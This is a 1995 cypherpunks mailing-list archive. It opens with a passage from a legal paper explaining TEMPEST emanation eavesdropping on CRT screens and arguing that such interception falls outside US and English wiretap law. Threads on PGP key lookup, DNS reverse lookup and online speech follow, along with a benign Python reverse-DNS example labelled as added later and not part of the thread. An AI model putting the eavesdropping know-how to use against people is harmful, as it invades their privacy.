          For  upon Secrecy,  Success depends  in Most  Enterprises of  the
          kind, and for  want of it,  they are generally defeated,  however
          well planned &  promising a favorable  issue."  Letter of  George
          Washington (Jul. 26, 1777).

          5.  "... I wish  you to take every possible pains in your powers,
          by  sending  trusty persons  to  Staten  Island in  whom  you can
          confide,  to  obtain  Intelligence  of  the Enemy's  situation  &
          numbers --  what kind of  Troops they are,  and what  Guards they
          have -- their strength & where posted."  Id.

          6.  Eavesdrip is  an Anglo-Saxon  word,  and refers  to the  wide
          overhanging eaves used  to prevent rain  from falling close to  a
          house's foundation.   The eavesdrip  provided "a sheltered  place
          where  one  could hide  to  listen clandestinely  to conversation
          within the house."   W. MORRIS & M. MORRIS,  MORRIS DICTIONARY OF
          WORD AND PHRASE ORIGINS, 198 (1977).

<New Page>
          monitoring of ELINT devices may be performed by a technician
          who has  no training  in the  art of spying.   The  gathered
          intelligence  may be  processed by  an intelligence  expert,
          perhaps  thousands of  miles  away, with  no  need of  field
          experience.  
               ELINT has a number of other advantages over HUMINT.  If
          a  spy is caught his existence could embarrass his employing
          state and he could  be forced into giving up  the identities
          of his compatriots  or other important information.   By its
          very nature, a discovered ELINT device (bug)  cannot give up
          any information; and the ubiquitous  nature of bugs provides
          the  principal  state  with the  ability  to  plausibly deny
          ownership or involvement.
               ELINT   devices   fall  into   two   broad  categories:
          trespassatory  and  non-trespassatory.   Trespassatory  bugs
          require some type of trespass in order for them to function.
          A transmitter  might require  the physical  invasion of  the
          target  premises  for placement,  or  a microphone  might be
          surreptitiously attached  to  the outside  of a  window.   A
          telephone transmitter can  be placed  anywhere on the  phone
          line, including at the  central switch.  The trespass  comes
          either when it is physically attached  to the phone line, or
          if it is  inductive, when placed  in close proximity to  the
          phone line.   Even microwave  bugs require the  placement of
          the resonator cone within the target premises.[7]
               Non-trespassatory  ELINT  devices  work   by  receiving
          electromagnetic radiation (EMR) as  it radiates through  the
          aether, and do not  require the placement of bugs.   Methods
          include intercepting[8] information transmitted  by satellite,
          microwave, and  radio, including mobile  and cellular  phone
          transmissions.   This information was  purposely transmitted
          with the intent that  some intended person or  persons would
          receive it.  
               Non-trespassatory ELINT also includes  the interception
          of information that  was never  intended to be  transmitted.
          All electronic devices emit electromagnetic radiation.  Some
          of  the  radiation,  as  with radio  waves,  is  intended to
          transmit  information.    Much  of  this  radiation  is  not
          intended to transmit information and is merely incidental to

          _____________________              

          7.  Pursglove, How  Russian Spy  Radios Work,  RADIO ELECTRONICS,
          89-91 (Jan 1962).

          8.  Interception  is  an  espionage  term of  art  and  should be
          differentiated from  its more common usage.   When information is
          intercepted, the interceptor  as well  as the intended  recipient
          receive the information.  Interception when not used as a term of
          art refers to one person receiving something intended for someone
          else; the intended recipient never receives what he  was intended
          to receive.

<New Page>
          whatever  work  the  target  device  is performing.[9]    This
          information  can be  intercepted  and reconstructed  into  a
          coherent  form.    With  current  TEMPEST technology  it  is
          possible to  reconstruct  the  contents  of  computer  video
          display  terminal  (VDU)  screens  from  up to  a  kilometer
          distant[10];  reconstructing  the  contents  of  a  computer's
          _____________________              

          9.  There are  two types  of emissions,  conducted and  radiated.
          Radiated  emissions are formed  when components or  cables act as
          antennas to transmit the EMR; when radiation is conducted  along
          cables or other connections but not radiated it is referred to as
          "conducted".  Sources  include cables,  the ground loop,  printed
          circuit boards, internal  wires, the power  supply to power  line
          coupling, the cable to cable coupling, switching transistors, and
          high-power  amplifiers.    WHITE  &  M. MARDIGUIAN,  EMI  CONTROL
          METHODOLOGY AND PROCEDURES,   10.1 (1985).
               "[C]ables  may act  as an  antenna to  transmit the  signals
          directly  or  even  both  receive the  signals  and  re-emit them
          further away  from the  source equipment.   It  is possible  that
          cables acting as an  antenna in such a manner could  transmit the
          signals  much  more  efficiently than  the  equipment  itself...A
          similar  effect  may occur  with metal  pipes  such as  those for
          domestic water supplies. ...  If an earthing [(grounding)] system
          is  not installed  correctly such  that there  is a  path  in the
          circuit  with a  very high  resistance (for  example  where paint
          prevents  conduction and  is acting  as an  insulator), then  the
          whole earthing  system could well act in  a similar fashion to an
          antenna. ...   [For a  VDU] the strongest  signals, or  harmonics
          thereof, are  usually between  60-250 MHz  approximately.   There
          have  however  been  noticeable  exception  of  extremely  strong
          emissions  in  the  television bands  and  at  higher frequencies
          between 450-800  MHz.  Potts,  Emission Security, 3  COMPUTER LAW
          AND SECURITY REPORT 27 (1988).

          10.  The TEMPEST ELINT operator can distinguish between different
          VDUs  in   the   same  room   because   of  the   different   EMR
          characteristics of both  homo and heterogeneous units.   "[T]here
          is little comparison  between EMR characteristics  from otherwise
          comparable equipment.   Only if the  [VDU] was made with  exactly
          the  same components  is there  any similarity.   If some  of the
          components have come from a different batch, have been updated in
          some   way,  and  especially   if  they  are   from  a  different
          manufacturer, then completely different results are obtained.  In
          this way a  different mark or version of the same [VDU] will emit
          different  signals.   Additionally  because  of the  variation of
          manufacturing standards between countries, two [VDUs] made by the
          same  company  but  sourced  from  different countries will  have
          entirely different EMR signal characteristics...From this  it may
          be thought that there is such a jumble of emissions  around, that
          it would not be possible to isolate those from any one particular
          source.  Again, this is not the case.  Most received signals have

<New Page>
          memory or the contents  of its mass storage devices  is more
          complicated and must be performed  from a closer distance.[11]
          The reconstruction  of information  via EMR,  a process  for
          which the  United States  government  refuses to  declassify
          either  the  exact  technique or  even  its  name[12], is  not
          limited to computers  and digital devices but  is applicable
          to  all devices  that generate  electromagnetic radiation.[13]
          TEMPEST is  especially effective  against VDUs  because they
          produce a very high level of EMR.[14]
          _____________________              
                                                                           
          a  different  line synchronization,  due  to  design, reflection,
          interference or  variation of component  tolerances.  So  that if
          for  instance  there  are three  different  signals  on the  same
          frequency  ...  by  fine  tuning  of  the  RF  receiver,  antenna
          manipulation  and modification  of  line synchronization,  it  is
          possible to lock onto each of the three signals separately and so
          read  the  screen information.    By  similar techniques,  it  is
          entirely  possible  to discriminate  between individual  items of
          equipment in the same room."  Potts, supra note 9.
               For  a discussion  of  the TEMPEST  ELINT  threat See  e.g.,
          Memory Bank, AMERICAN BANKER 20 (Apr 1 1985); Emissions from Bank
          Computer Systems  Make Eavesdropping Easy,  Expert Says, AMERICAN
          BANKER  1  (Mar  26 1985);  CRT  spying:  a  threat to  corporate
          security, PC WEEK (Mar 10 1987).

          11.  TEMPEST is  concerned  with  the  transient  electromagnetic
          pulses formed  by digital  equipment.   All electronic  equipment
          radiates  EMR  which  may be  reconstructed.    Digital equipment
          processes information as 1's and 0's--on's  or off's.  Because of
          this, digital equipment  gives off pulses  of EMR.  These  pulses
          are easier to  reconstruct at a  distance than the non-pulse  EMR
          given off by analog equipment.  For a thorough discussion of  the
          radiation  problems  of  broadband digital  information  see e.g.
          military standard MIL-STD-461   REO2; White supra note 9,   10.2.

          12.  See supra note 2.

          13.       Of special interest  to ELINT  collectors are EMR  from
          computers,  communications   centers  and  avionics.     Schultz,
          Defeating Ivan with TEMPEST, DEFENSE ELECTRONICS 64 (June 1983). 

          14.     The  picture on  a  CRT screen  is  built up  of  picture
          elements  (pixels) organized  in lines  across the  screen.   The
          pixels  are made  of material  that fluoresces  when struck  with
          energy.  The energy is produced by a beam of electrons fired from
          an electron gun  in the back of  the picture tube.   The electron
          beam scans the screen of the  CRT in a regular repetitive manner.
          When the voltage of the beam is high then the pixel it is focused
          upon  emits  photons and  appears as  a  dot on  the screen.   By
          selectively firing  the gun as  it scans across  the face of  the
          CRT, the pixels form characters on the CRT screen.
<New Page>
               ELINT is not limited to  governments.  It is  routinely
          used by  individuals for  their  own purposes.   Almost  all
          forms of ELINT are  available to the individual with  either
          the technological  expertise or  the money  to hire  someone
          with  the  expertise.     Governments   have  attempted   to
          criminalize all use  of ELINT by their  subjects--to protect
          the privacy of both the government and the population.

                              II. UNITED STATES LAW
               In the United States, Title III of  the Omnibus Streets
          and Crimes Act of 1968[15] criminalizes trespassatory ELINT as
          the intentional interception  of wire communications.[16]   As
          originally  passed,   Title  III   did  not  prohibit   non-

          _____________________              
                                                                           
               The pixels  glow for  only a  very  short time  and must  be
          routinely struck by the electron beam  to stay lit.  To  maintain
          the light output of  all the pixels that are supposed  to be lit,
          the electron beam traverses  the entire CRT screen sixty  times a
          second.   Every time the beam fires it  causes a high voltage EMR
          emission.  This EMR  can be used  to reconstruct the contents  of
          the  target CRT  screen.   TEMPEST  ELINT  equipment designed  to
          reconstruct the information synchronizes its  CRT with the target
          CRT.  First, it uses the EMR to synchronize its electron gun with
          the electron gun in the target CRT.  Then, when the TEMPEST ELINT
          unit detects EMR indicating that the target CRT fired on a pixel,
          the TEMPEST ELINT  unit fires the electron  gun of its CRT.   The
          ELINT CRT is in perfect synchronism with the target CRT; when the
          target lights a pixel, a corresponding pixel on the TEMPEST ELINT
          CRT  is lit.  The exact picture on  the target CRT will appear on
          the TEMPEST ELINT  CRT.  Any changes on the target screen will be
          instantly reflected in the TEMPEST ELINT screen. 
               TEMPEST Certified equipment gives off emissions  levels that
          are too faint to  be readily detected.  Certification  levels are
          set   out  in   National   Communications  Security   Information
          Memorandum  5100A   (NACSIM  5100A).    "[E]mission   levels  are
          expressed in the time  and frequency domain, broadband or  narrow
          band  in terms of the frequency domain, and in terms of conducted
          or radiated emissions."  White, supra, note 9,   10.1.
               For a  thorough  though purposely  misleading discussion  of
          TEMPEST ELINT see  Van Eck, Electromagnetic Radiation  from Video
          Display units: An Eavesdropping Risk?, 4 Computers & Security 269
          (1985).

          15.   Pub. L.  No. 90-351,  82 Stat. 197.   The Act  criminalizes
          trespassatory  ELINT  by  individuals  as  well  as  governmental
          agents.  cf.  Katz v. United States, 389 U.S. 347  (1967) (Fourth
          Amendment prohibits surveillance by government not individuals.) 

          16.  18 U.S.C.   2511(1)(a).

<New Page>
          trespassatory  ELINT,[17] because  courts found  that non-wire
          communication lacked any expectation of privacy.[18]   The
          Electronic Communications  Privacy  Act  of  1986[19]  amended
          Title  III  to  include non-wire  communication.    ECPA was
          specifically  designed  to include  electronic  mail, inter-
          computer  communications,  and  cellular  telephones.     To
          accomplish  this,  the  expectation  of  privacy   test  was
          eliminated.[20]
               As  amended, Title  III  still outlaws  the  electronic
          interception of  communications.  The  word "communications"
          indicates  that   someone  is   attempting  to   communicate
          something to someone; it  does not refer to the  inadvertent
          transmission   of   information.       The   reception   and
          reconstruction of emanated transient  electromagnetic pulses
          (ETEP), however, is based on  obtaining information that the
          target does  not  mean to  transmit.   If  the ETEP  is  not
          intended as communication, and  is therefore not transmitted
          in a form approaching current communications protocols, then
          it can not  be considered communications as  contemplated by
          Congress  when  it   amended  Title  III.     Reception,  or
          interception, of emanated  transient electromagnetic  pulses
          is not criminalized by Title III as amended.

                                III. ENGLISH LAW
               In  England  the  Interception  of  Communications  Act
          1985[21] criminalizes the tapping of  communications sent over

          _____________________              

          17.  United States v. Hall,  488 F.2d 193 (9th Cir.  1973) (found
          no legislative history  indicating Congress  intended the act  to
          include radio-telephone conversations).  Further,  Title III only
          criminalized  the interception  of  "aural" communications  which
          excluded all forms of computer communications.  

          18.  Willamette  Subscription Television  v.  Cawood, 580  F.Supp
          1164 (D. Or. 1984) (non-wire communications lacks any expectation
          of privacy).

          19.  Pub. L. No. 99-508, 100 Stat. 1848 (codified at 18 U.S.C.   
          2510-710) [hereinafter ECPA].

          20.  18 U.S.C.   2511(1)(a) criminalizes the interception of "any
          wire,  oral  or electronic  communication"  without regard  to an
          expectation of privacy.

          21.  Interception of Communications Act 1985,  Long Title, An Act
          to make new provision for and in connection with the interception
          of  communications  sent   by  post   or  by   means  of   public
          telecommunications  systems  and  to  amend  section  45  of  the
          Telecommunications Act 1984.

<New Page>
          public  telecommunications  lines.[22]   The  interception  of
          communications on  a telecommunication line  can take  place
          with a physical tap on the line, or the passive interception
          of microwave or  satellite links.[23]  These  forms of passive
          interception  differ  from TEMPEST  ELINT  because  they are
          intercepting   intended    communication;   TEMPEST    ELINT
          intercepts unintended  communication.  Eavesdropping  on the
          emanations  of  computers does  not  in any  way  comport to
          tapping a telecommunication line and therefore falls outside
          the scope of the statute.[24]

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 11 Feb 95 17:06:32 PST
To: cypherpunks@toad.com
Subject: Re: Does PGP scale well?
In-Reply-To: <9502112237.AA17845@snark.imsi.com>
Message-ID: <199502120105.RAA20992@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I was just reading RFC1034 about DNS, and one thing I noted was that there is a
"reverse lookup" feature.  This allows you to go from, say, 156.151.1.101
to portal.com.  This problem seems similar in some ways to the key lookup
problem since you have a relatively unstructured number and you want to
use it as a lookup key.

According to the RFC, if you want to know what host machine is at
address 156.151.1.101, you do a lookup of 156.151.1.101.IN-ADDR.ARPA.
The RFC did not make it very clear how this is done.  Does this use a
"flat" database?    Is it distributed in some way?  Or has this method
perhaps been superseded by some other?

I can see that the key problem is worse than the reverse lookup problem
because there are many more users than hosts.  Although in the long run
won't everybody have a computer at home that has an IP address?  Will the
nameserver hierarchy run into problems then?  There is no obvious
hierarchical arrangement as we have now with our .edu and .com sites,
unless we go geographical.  This seems analogous to the PEM/RSA key
certificate hierarchy problem.  In any case the reverse lookup problem
seems like it will be difficult then.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 11 Feb 95 14:26:05 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Does PGP scale well?
Message-ID: <ab62e915050210045172@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:53 PM 02/11/95, Tom Jones wrote:
>One of the reasons that I consider this to be untrue is my empirical
>experience with two groups that are constantly interested in exactly
>who I am: the government and the credit bureaus.  They both chose to
>use my SSN even though that has all the same attributes of a KeyID,
>except that it is somewhat denser.  Now if this is what happens when
>the real world tries to identify me, why is the KeyID such a bad way to
>identify keys?

It seems like it might be important to note, however, that the government
identification systems are definitely _centralized_ modes of information
storage and distribution.  Credit bureaus are less obviously centralized,
but still perhaps centralized.  And it could be argued that credit bureaus
would never have used a system like social security numbers for
identification if it hadn't already been in widespread use in the
centralized governmental systems which created it.

This is in sharp contrast to the decentralized mode that we want our
encryption and authorization to function in.  This is for
anti-authoritarian reasons, as well as simply practical reasons.  When the
government is involved, it can mandate that everyone use the system they
are in control of, and they can get the necessary manpower to actually
implement a centralized system too.  But we don't want to have to trust any
one authority, and we also want a system where everyone does their own work
(like DNS, where every domain has its own server), if possible.

Conventional wisdom is that PGP is inherently decentralized, and it is, in
a sense, and in its current web-of-trust model.  But a
social-security-number model of key distribution would definitely _not_ be
centralized.  You are assigned your social security number by a central
authority, and others can look up your social security number by consulting
with that central authority, or with other authorities that have themselves
consulted with the central authority.  That's not a model most of us think
desirable for PGP key distribution.

[It also could be noted that a SSN has some contained meaning, where a PGP
keyid doesn't.  The prefixes on your SSN say what state (and maybe even
what county, I'm not sure) you were born in.  But generally this isn't very
useful information, so this probably isn't an important point.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 11 Feb 95 14:38:00 PST
To: A5113643667@attpls.net (Tom Jones)
Subject: Re: Does PGP scale well?
In-Reply-To: <9811968B>
Message-ID: <9502112237.AA17845@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Jones says:
> Perry has repeated a litany here that I have been hearing for years on
> the pem-dev list with never a hint of a justification.  That is that
> PGP does not scale well.

I've given plenty of justification. You can't reverse map keys. Isn't
that bad enough?

> One of the reasons that I consider this to be untrue is my empirical
> experience with two groups that are constantly interested in exactly
> who I am: the government and the credit bureaus.  They both chose to
> use my SSN even though that has all the same attributes of a KeyID,
> except that it is somewhat denser.

Ahem.

Next you'll tell us that the hosts.txt database was a great idea and
you see no reason why we should have built the DNS. After all, host
addresses are only 32 bits, so the problem of mapping them into
hostnames should be easy to do in a flat database, right?

If you'd like to volunteer to run the centralized databases containing
the (at least) five billion keys for the population of the planet,
including handling tens to hundreds of billions of hits against them
per day, and probably tens of millions of updates per day (perhaps
you'd like us to enter them by hand, too?) and you'd like to supply
this service for free, then we will certainly be willing to talk.

Until you volunteer, however, leave the engineering to the people with
some experience in building large scale systems?


Perry

(Sure, TRW can store 100 million records in a giant database and index
them purely by a single unstructured number. 'taint cheap or fast,
however, and it certainly isn't amenable to decentralized maintenance
of the data.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gary Jeffers" <CCGARY@MIZZOU1.missouri.edu>
Date: Sat, 11 Feb 95 15:26:37 PST
To: cypherpunks@toad.com
Subject: Secure Drive ver. & loc. ?
Message-ID: <199502112322.SAA09620@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear Cypherpunks,
   Does anyone know where the latest version of SECURE DRIVE really is
& what the latest version is?
                                           Yours Truly,
                                           Gary Jeffers
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz1GuyoZzwIn1bdtAQFCrwF/ZH4w9VdubpZRH8JPRDm+N56aMNVg3riW
EcVCDcsWaTUUqFB8E1fazTfJSL2mAgEP
=eE7u
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Sat, 11 Feb 95 17:56:25 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: law vs technology
In-Reply-To: <199502102253.RAA10658@ducie.cs.umass.edu>
Message-ID: <199502120156.UAA27335@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


L. Futplex McCarthy's reply to Wei Dei:

[ Snip! ]

> As a separate issue, there are quite a few vocal opponents of groups such as
> EFF on the list. I've no idea whether there's a silent majority ;) of lurkers
> who fully support EFF et al., but I suspect a sizable chunk of the list
> population disagrees that there are many people really fighting invasive govt.
> action.

There's an advantage of techies getting politically active, provided they
can explain the systems in an understandable way that is interesting, and
provided that these issues hit home to them (ie, that you're not talking
in technobabble and that they see the need for privacy technologies in
their own lives).

What I find harder to do is to get through to people who have given up on
the government not eroding what little rights remain, or who are already
afraid that the FBI/CIA/NSA/KGB/etc. are already watching their every move.

I'm working on a fax to send to congresspersons as a start. I'd like to
get local political action groups hip to the issues as well to get the ball
rolling in the right direction as well.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Sat, 11 Feb 95 19:18:29 PST
To: hfinney@shell.portal.com (Hal)
Subject: Re: Does PGP scale well?
In-Reply-To: <199502120105.RAA20992@jobe.shell.portal.com>
Message-ID: <199502120318.VAA27650@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Hal <hfinney@shell.portal.com>
> 
> I was just reading RFC1034 about DNS, and one thing I noted was that
> there is a "reverse lookup" feature.  This allows you to go from, say,
> 156.151.1.101 to portal.com.  This problem seems similar in some ways to
> the key lookup problem since you have a relatively unstructured number
> and you want to use it as a lookup key.
[...]
> According to the RFC, if you want to know what host machine is at
> address 156.151.1.101, you do a lookup of 156.151.1.101.IN-ADDR.ARPA.
> The RFC did not make it very clear how this is done. [...]

Actually you do a lookup on 101.1.151.156.in-addr.arpa, it is reversed
because of the way addresses are structured.  This is part of the
problem with PGP keys and DNS: PGP key IDs are unstructured and randomly
distributed, IP addresses are not really unstructured and their
distribution is not random.  A reverse lookup (aka "pointer query") happens
the same way as a regular name lookup, it just reverses the order of the
bytes in the IP address and then resolves it in the same method as a
regular name, from the least specific to most specific parts of the
address. 

With a PGP key ID there is no order to the distribution of the IDs, so it
is not like one could delegate authority for bits in a key ID the same way
that one can with bits/bytes in an IP address.  The inability to delegate
chunks of the key ID space is what will prevent lookups by keyID; no one
can run a single server that has all the IDs and the organizational
problems with delegating random chunks of the keyID-space are fairly obvious
(e.g. in the DNS model you are responsible for your own address space and
it is in your own self-interest to make sure that it works, the same cannot
be said of keyID-space)

jim



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Sat, 11 Feb 95 13:53:51 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: Does PGP scale well?
Message-ID: <9811968B>
MIME-Version: 1.0
Content-Type: text


Perry has repeated a litany here that I have been hearing for years on
the pem-dev list with never a hint of a justification.  That is that
PGP does not scale well.

One of the reasons that I consider this to be untrue is my empirical
experience with two groups that are constantly interested in exactly
who I am: the government and the credit bureaus.  They both chose to
use my SSN even though that has all the same attributes of a KeyID,
except that it is somewhat denser.  Now if this is what happens when
the real world tries to identify me, why is the KeyID such a bad way to
identify keys?

Please note that I do understand that identifying me and finding me are
separate issues.  I'm not sure that the pem-dev folk clearly
discriminate these.

Peace. Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sat, 11 Feb 95 22:16:29 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: Does PGP scale well?
In-Reply-To: <199502120105.RAA20992@jobe.shell.portal.com>
Message-ID: <9502120616.AA18409@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal says:
> I was just reading RFC1034 about DNS, and one thing I noted was that
> there is a "reverse lookup" feature.  This allows you to go from,
> say, 156.151.1.101 to portal.com.  This problem seems similar in
> some ways to the key lookup problem since you have a relatively
> unstructured number and you want to use it as a lookup key.
> 
> According to the RFC, if you want to know what host machine is at
> address 156.151.1.101, you do a lookup of 156.151.1.101.IN-ADDR.ARPA.

No, you got that wrong. You do a lookup on 101.1.151.156.IN-ADDR.ARPA
-- note the component reversal. The reversal is very key.

> The RFC did not make it very clear how this is done.  Does this use a
> "flat" database?

No. It's fully distributed. The fact that networks are assigned in
hierarchical chunks should explain how it's done, and why the bytes get
reversed for the lookup. As an example, MIT owns network 18, which is
to say that all MIT addresses are 18.XXX.XXX.XXX, and 18.IN-ADDR.ARPA
is a server at MIT. MIT may have sub-servers beyond that level, but
DNS makes us oblivious to this.

For IPv6, the reverse lookup is going to be segregated at the nybble
boundaries rather than at the byte boundaries because of CIDR style
classless allocation. The domain will be IP6.INT rather than IN-ADDR.ARPA

Perry
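
[Added example, not part of any message in this thread.] The reverse-lookup construction described in Jim McCoy's and Perry Metzger's replies, with the contrast both draw against key IDs: address prefixes fall under one owner's delegated zone, while key-ID prefixes mix unrelated owners. Assumptions: the delegation table, the organisation names other than MIT's network 18, and the SHA-256 stand-in for "randomly distributed" key IDs are constructed for illustration; the IPv6 suffix used is ip6.arpa, which later replaced the IP6.INT named above.

```python
import hashlib
import ipaddress
from collections import defaultdict


def reverse_name(addr):
    """Return the pointer-query name for an IPv4 or IPv6 address."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 4:
        # Octets are reversed so the network part ends up next to the
        # root, which is where DNS delegation takes place.
        labels = str(ip).split(".")
        return ".".join(reversed(labels)) + ".in-addr.arpa"
    # IPv6: one label per 4-bit nibble, so a zone cut can fall on any
    # nibble boundary (classless allocation).
    nibbles = ip.packed.hex()
    return ".".join(reversed(nibbles)) + ".ip6.arpa"


def delegation_walk(name):
    """Zones a resolver passes through, least specific first."""
    labels = name.split(".")
    return [".".join(labels[i:]) for i in range(len(labels) - 1, -1, -1)]


# Constructed delegation table. Only "network 18 is MIT" comes from the
# thread; the 156.151 cut for portal.com is an assumed block size.
DELEGATIONS = {
    "18.in-addr.arpa": "mit",
    "151.156.in-addr.arpa": "portal",
}


def authoritative_zone(name, delegations=DELEGATIONS):
    """Longest delegated suffix of name and its owner, or None."""
    for zone in reversed(delegation_walk(name)):  # most specific first
        if zone in delegations:
            return zone, delegations[zone]
    return None


# Constructed first-octet allocations, one network per organisation.
NETWORKS = {"mit": 18, "portal": 156, "org-c": 198, "org-d": 203}


def constructed_key_id(user):
    """Stand-in for a key ID: 64 bits with no structure (assumption)."""
    return hashlib.sha256(user.encode()).hexdigest()[:16]


def mixed_buckets(pairs):
    """Count prefixes that contain identifiers from more than one owner."""
    buckets = defaultdict(set)
    for prefix, org in pairs:
        buckets[prefix].add(org)
    mixed = sum(1 for orgs in buckets.values() if len(orgs) > 1)
    return mixed, len(buckets)


def compare(users_per_org=500):
    """Bucket addresses by top-level reverse label and key IDs by first byte."""
    ip_pairs, key_pairs = [], []
    for org, net in NETWORKS.items():
        for i in range(users_per_org):
            addr = f"{net}.{i // 250}.{i % 250 + 1}.1"
            # Label just below in-addr.arpa, i.e. the first delegation point.
            ip_pairs.append((reverse_name(addr).split(".")[3], org))
            key_pairs.append((constructed_key_id(f"user{i}@{org}")[:2], org))
    return mixed_buckets(ip_pairs), mixed_buckets(key_pairs)


if __name__ == "__main__":
    name = reverse_name("156.151.1.101")
    print(name, "->", authoritative_zone(name))
    print(delegation_walk(reverse_name("18.72.0.3")))
    print(reverse_name("2001:db8::1"))
    (ip_mixed, ip_total), (key_mixed, key_total) = compare()
    print(f"address prefixes shared by several owners: {ip_mixed}/{ip_total}")
    print(f"key-ID prefixes shared by several owners:  {key_mixed}/{key_total}")
```
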




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Sun, 12 Feb 95 02:25:38 PST
To: cypherpunks@toad.com
Subject: Re: UMich student arrested for rape story
Message-ID: <199502121026.CAA19268@igc3.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> From:          "L. McCarthy" <lmccarth@ducie.cs.umass.edu>

> Rich Dutcher writes:
> > They *do* have to prove intent -- as to how, that's what juries are 
> > for.  BTW, he used her real name in the post, with no disclaimers 
> > about fiction.  From what I have heard, if he had said the same thing 
> > in her presence, he could have been arrested for assault.
> 
> Based on the NY Times article I've read, you're omitting some important
> extenuating circumstances here. For one thing, it was apparently posted to
> alt.sex.stories, which seems to obviate the use of "fictional" disclaimers.
> Furthermore, he did _not_ identify her as a UMich student.
> 
Well, I was quoting a small AP story in a paper notorious for
clipping articles short, so I knew that some [if not many]
circumstances would be missing.  In conversations today at
Potlatch 4 I learned of other circumstances, albeit not
necessarily what I would call "extenuating" ones.  And the
lawyers, of course, will be spin controlling from now until a
verdict.

> I don't see the relevance of "if he had said the same thing in her presence".
> He *didn't* !  There's an enormous difference between making a comment about
> a person to third parties, and making the comment to that person.
> 
Not necessarily -- there's lots of case law that the threatened
person need not be present to be threatened.  The people present
are still witnesses.  I agree there's a difference, but its nature
isn't obvious.  Precisely what that difference is is up to judges,
juries and [goddess help us!] legislators.

> According to the NY Times story, the woman mentioned in the story only heard
> about it because reporters asked her about it !  I find a great deal of irony
> in the report that the controversy started because an alt.sex.stories reader
> in _Moscow_ tipped off the UMich authorities.
> 
Irony noted and appreciated -- but it does illustrate the "public" 
nature of the forum.

> It appears that the Russians are allowed to read erotic fiction, while the
> Americans are forbidden to read it, and get tossed in jail for writing it.
> We've come a long way, baby. Yeah.
> 
>  -L. Futplex McCarthy

I was in high school while the Supremes [the real Supremes, with 
Earl Warren, not the bogus nostalgia group currently wearing the 
black robes] were doing the decisions that allowed Joyce and Lawrence 
to be sold in bookstores, and I was taught Shakespeare from a 
bowdlerized edition of Romeo & Juliet.  Trust me, we aren't in a 
place remotely like that now [not that there aren't plenty of people 
trying to get back there].

Which is not to say I'm complacent -- when I have money to spare from 
Green work, it goes to the ACLU.  Eternal vigilance and all that.  
And this dude is entitled to presumption of innocence, a jury trial, 
and all the other paraphernalia of procedural liberty.

However, given the information available to date, I see no reason to 
believe that he's been busted for writing "erotic fiction"  rather than 
threatening a woman.  Violence against women is too real, and in 
other contexts courts have held to a standard of what a "reasonable 
woman" might fear.

BTW, does alt.sex.stories presume fiction, or is it pretend truth 
like the readers' sex stories in Penthouse?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <0003701548@mcimail.com>
Date: Sun, 12 Feb 95 00:20:15 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Fwd: Re: West (just a minute)
Message-ID: <71950212081717/0003701548PJ2EM@MCIMAIL.COM>
MIME-Version: 1.0
Content-Type: text/plain



the most reasonable and easiest to implement solution to eliminating the
need for west's page number system is to just number each paragraph.
anyone can do this.


-----------------
Forwarded Message

Date:     Sat Feb 11, 1995  5:57 am  EST
Source-Date: Sat, 11 Feb 1995 05:49:47 -0500 (EST)
From:     Craig Hubley
          EMS: INTERNET / MCI ID: 376-5414
          MBX: craig@passport.ca
 
TO:     * Alan Pugh / MCI ID: 370-1548
Subject:  Re: West (just a minute)
Message-Id: 81950211105718/0003765414DC2EM
Source-Msg-Id: <m0rdFOe-0002IhC@forged.passport.ca>
U-Mime-Version: 1.0
U-Content-Type: text/plain; charset=US-ASCII
 

Hmm, 
how hard could it be to eliminate West page numbers?

There couldn't be more than a couple of cases on each page, 
if each page number were replaced by links to each case, a
lawyer could tell on the first glance which of the three was
right and mark it, assuming a reasonable HTML/SGML editor or
something.  Seems like it could be done as a part of daily work
and the results accreted somewhere.
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peace@BIX.com
Date: Sun, 12 Feb 95 02:50:41 PST
To: cypherpunks@toad.com
